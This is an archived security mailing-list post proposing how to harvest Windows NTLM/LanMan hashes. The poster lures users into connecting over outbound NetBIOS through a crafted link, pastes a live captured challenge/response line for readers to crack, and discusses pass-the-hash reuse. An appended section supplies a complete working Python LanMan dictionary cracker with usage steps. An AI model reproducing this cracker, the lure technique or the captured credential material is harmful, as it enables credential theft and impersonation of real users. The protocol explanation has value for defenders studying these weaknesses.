Vulnerability Development mailing list archives

Hash Harvesting


From: davel () ECST CSUCHICO EDU
Date: Fri, 18 Aug 2000 14:02:25 -0700

First a disclaimer, I am a mere sys admin mortal, so if I say something stupid here, please forgive me. Also, please correct me so I can become less ignorant.

I'm not going to suggest anything new here, but I am going to look at combining three different "attacks" into one. If they can be combined, I think they will be extremely potent.

1. It is possible to obtain the IP Address, User Name, Challenge, NT Hash and LanMan Hash from a user situated behind a firewall. If I were to entice a user at a Windows NT/2000 computer to attempt to connect to my NT/2000 computer they will pass me this information. All I need for this to happen is for outbound NetBIOS traffic to be allowed at their firewall. I propose that this is far more common than it should be.

I am now going to paste in a live capture, where I have changed the User Name and Domain, but left the hashes and the challenge intact. Copy and paste this into a text file and crack it. If your dictionary file is any good it should take about 2 seconds (or less).

<paste>

DOMAIN\USER:3:0d7a5a3319525f12:26cf3ed46c3d64b679528bf96f635a74b0c04e2f39d3b926:000000000000000000000000000000000000000000000000
DOMAIN\USER:3:0d7a5a3319525f12:26cf3ed46c3d64b679528bf96f635a74b0c04e2f39d3b926:000000000000000000000000000000000000000000000000

</paste>

I can think of a number of ways to get people to do this without initially being aware that they are doing so. Simply crafting a link in a website is one.

2. It is possible to modify the Windows NT logon credentials, which will allow you to use a hash (without cracking it) to impersonate a legitimate user of a resource. See Hernán Ochoa's paper at http://www.core-sdi.com/papers/nt_cred.htm for the details. For this to work the computer you are attacking must allow LanMan hashes. I don't know of many pure NT networks, so I suspect finding computers that accept LanMan hashes will be even easier than finding firewalls that allow outbound NetBIOS traffic.

3. This one is stretching a bit, but what the heck... Robert Graham (http://www.robertgraham.com/) has written a program that he calls soibten which "will reflect … NetBIOS scans back [to] the sender". If there was some way to expand this so that instead of reflecting a scan back to the sender, that we instead were able to send back packets crafted in the manner covered by Hernán Ochoa, could we then access that machine merely because they tried to access us?

I've asked around a little bit, and one response I have received doesn't seem to match what I am seeing... This is what I was told by an individual whose knowledge and ability I respect:

<paste>

One big mistake in your scenario is expecting the hashes to be sent to you
- that's not how it works - conversation goes like this:

Client to server - I want to log onto resource, my name is -
Server to client - OK, here's your challenge
Client to Server - here's your challenge encrypted with my hash as a key

</paste>

I can't reconcile that with the L0phtcrack SMB capture included in this message.

Even if these separate "attacks" can't be combined, the first item I mentioned should be a great way to get many, many hashes. I've been told that Hobbit may have proposed this a number of years back. If that is the case, can someone please point me to a URL so I can read that paper?

Again, just a lowly admin here folks, anything you can provide to make me wiser is always appreciated.
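The exchange quoted above and the capture line from L0phtCrack describe the same thing from two sides: the client never puts its hash on the wire; it DES-encrypts the server's 8-byte challenge under keys cut from the hash, and those 24-byte results are what the response fields of the capture hold. A dictionary crack recomputes that response per candidate password and compares. The script below is an added example, not code from the post, from L0phtCrack or from Core SDI. It implements DES in pure Python so it runs offline, computes the LanMan hash and the LanMan challenge/response, parses a user:id:challenge:response:response line of the kind pasted in the post, and runs a wordlist against it. Assumptions: the field layout and the reading of an all-zero response field as "no response in this slot" are taken from the paste; the function and variable names are this example's own; the NT response (the same DES construction over the MD4 hash of the UTF-16LE password) is described in a comment but not computed, since that would need an MD4 implementation.

```python
"""LanMan challenge/response as it crosses the wire, plus a dictionary crack of a capture line.
Added example, not code from the post, L0phtCrack or Core SDI. DES is implemented in pure Python
(FIPS 46-3 tables) so this runs offline; the capture-line layout and the handling of an all-zero
response field are assumptions taken from the post's paste."""

# DES, bit-list style: written to be read, not to be fast. Tables are 1-indexed as in the standard.
_PC1 = [57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26, 18, 10, 2, 59, 51, 43, 35, 27, 19, 11, 3,
        60, 52, 44, 36, 63, 55, 47, 39, 31, 23, 15, 7, 62, 54, 46, 38, 30, 22, 14, 6, 61, 53, 45, 37,
        29, 21, 13, 5, 28, 20, 12, 4]
_PC2 = [14, 17, 11, 24, 1, 5, 3, 28, 15, 6, 21, 10, 23, 19, 12, 4, 26, 8, 16, 7, 27, 20, 13, 2,
        41, 52, 31, 37, 47, 55, 30, 40, 51, 45, 33, 48, 44, 49, 39, 56, 34, 53, 46, 42, 50, 36, 29, 32]
_IP = [58, 50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20, 12, 4, 62, 54, 46, 38, 30, 22, 14, 6,
       64, 56, 48, 40, 32, 24, 16, 8, 57, 49, 41, 33, 25, 17, 9, 1, 59, 51, 43, 35, 27, 19, 11, 3,
       61, 53, 45, 37, 29, 21, 13, 5, 63, 55, 47, 39, 31, 23, 15, 7]
_FP = [_IP.index(i + 1) + 1 for i in range(64)]  # final permutation is the inverse of IP
_E = [32, 1, 2, 3, 4, 5, 4, 5, 6, 7, 8, 9, 8, 9, 10, 11, 12, 13, 12, 13, 14, 15, 16, 17,
      16, 17, 18, 19, 20, 21, 20, 21, 22, 23, 24, 25, 24, 25, 26, 27, 28, 29, 28, 29, 30, 31, 32, 1]
_P = [16, 7, 20, 21, 29, 12, 28, 17, 1, 15, 23, 26, 5, 18, 31, 10,
      2, 8, 24, 14, 32, 27, 3, 9, 19, 13, 30, 6, 22, 11, 4, 25]
_SHIFTS = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]
_SBOX = [[int(c, 16) for c in s] for s in (  # S1..S8, each 4 rows x 16 entries as hex digits
    "e4d12fb83a6c59070f74e2d1a6cb953841e8d62bfc973a50fc8249175b3ea06d",
    "f18e6b34972dc05a3d47f28ec01a69b50e7ba4d158c6932fd8a13f42b67c05e9",
    "a09e63f51dc7b428d709346a285ecbf1d6498f30b12c5ae71ad069874fe3b52c",
    "7de3069a1285bc4fd8b56f03472c1ae9a690cb7df13e52843f06a1d8945bc72e",
    "2c417ab6853fd0e9eb2c47d150fa3986421bad78f9c5630eb8c71e2d6f09a453",
    "c1af92680d34e75baf427c9561de0b389ef528c3704a1db6432c95fabe17608d",
    "4b2ef08d3c975a61d0b7491ae35c2f8614bdc37eaf6805926bd814a7950fe23c",
    "d2846fb1a93e50c71fd8a374c56b0e927b419ce206adf35821e74a8dfc90356b")]

def _bits(data):
    return [(b >> (7 - i)) & 1 for b in data for i in range(8)]

def _unbits(bits):
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8))

def _perm(bits, table):
    return [bits[i - 1] for i in table]

def _subkeys(key8):
    k = _perm(_bits(key8), _PC1)
    c, d, keys = k[:28], k[28:], []
    for s in _SHIFTS:
        c, d = c[s:] + c[:s], d[s:] + d[:s]
        keys.append(_perm(c + d, _PC2))
    return keys

def _feistel(r, k):
    x = [a ^ b for a, b in zip(_perm(r, _E), k)]
    out = []
    for i in range(8):
        b = x[6 * i:6 * i + 6]  # outer two bits pick the S-box row, inner four the column
        v = _SBOX[i][((b[0] << 1) | b[5]) * 16 + ((b[1] << 3) | (b[2] << 2) | (b[3] << 1) | b[4])]
        out += [(v >> 3) & 1, (v >> 2) & 1, (v >> 1) & 1, v & 1]
    return _perm(out, _P)

def des_encrypt_block(key8, block8):
    bits = _perm(_bits(block8), _IP)
    l, r = bits[:32], bits[32:]
    for k in _subkeys(key8):
        l, r = r, [a ^ b for a, b in zip(l, _feistel(r, k))]
    return _unbits(_perm(r + l, _FP))

def _des_key(key7):  # 7 bytes -> 8: append an odd-parity bit (ignored by DES) after every 7 bits
    bits = _bits(key7)
    return _unbits([b for i in range(8) for b in bits[7 * i:7 * i + 7] + [1 - sum(bits[7 * i:7 * i + 7]) % 2]])

def lm_hash(password):
    """LM hash: uppercase, pad to 14 bytes, DES-encrypt "KGS!@#$%" under each 7-byte half (ASCII only here)."""
    pw = password.upper().encode("ascii", "replace")[:14].ljust(14, b"\0")
    return b"".join(des_encrypt_block(_des_key(pw[i:i + 7]), b"KGS!@#$%") for i in (0, 7))

def lm_response(hash16, challenge8):
    """What the client sends: the server's 8-byte challenge DES-encrypted under each 7-byte third of
    the hash padded to 21 bytes. The NT response is the same construction over the NT (MD4) hash."""
    key21 = hash16.ljust(21, b"\0")
    return b"".join(des_encrypt_block(_des_key(key21[i:i + 7]), challenge8) for i in (0, 7, 14))

def parse_capture_line(line):
    """Split a user:id:challenge:response:response line as in the post's paste. An all-zero response
    field (assumed here to mean no response in that slot, as in the paste's last field) is dropped."""
    user, ident, chal, *resps = line.strip().split(":")
    responses = [bytes.fromhex(r) for r in resps if set(r) != {"0"}]
    if len(chal) != 16 or any(len(r) != 24 for r in responses):
        raise ValueError("unexpected field length in: " + line)
    return {"user": user, "id": ident, "challenge": bytes.fromhex(chal), "responses": responses}

def build_capture_line(user, challenge8, password):
    """Constructed capture line (not from the post): what a sniffer would log for this challenge and password."""
    return "%s:3:%s:%s:%s" % (user, challenge8.hex(), lm_response(lm_hash(password), challenge8).hex(), "0" * 48)

def crack_lm(entry, wordlist):
    """Dictionary attack on one captured line: recompute the LM response per candidate and compare."""
    for word in wordlist:
        if lm_response(lm_hash(word), entry["challenge"]) in entry["responses"]:
            return word.upper()
    return None
```

To try it, build a line with `build_capture_line("DOMAIN\\USER", bytes.fromhex("0d7a5a3319525f12"), "Secret7")` (the challenge value is the one from the paste), feed it through `parse_capture_line`, and hand the result plus a wordlist to `crack_lm`. Two properties worth seeing in the output: for any password of seven characters or fewer the second half of `lm_hash` is the constant `aad3b435b51404ee`, and the last 8 bytes of `lm_response` depend only on bytes 14 and 15 of the hash, because the 21-byte key is the 16-byte hash plus five zero bytes; both are why LanMan material cracks so quickly. This pure-Python DES manages a few hundred candidates per second, which is fine for a demonstration but not a substitute for a real cracker.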
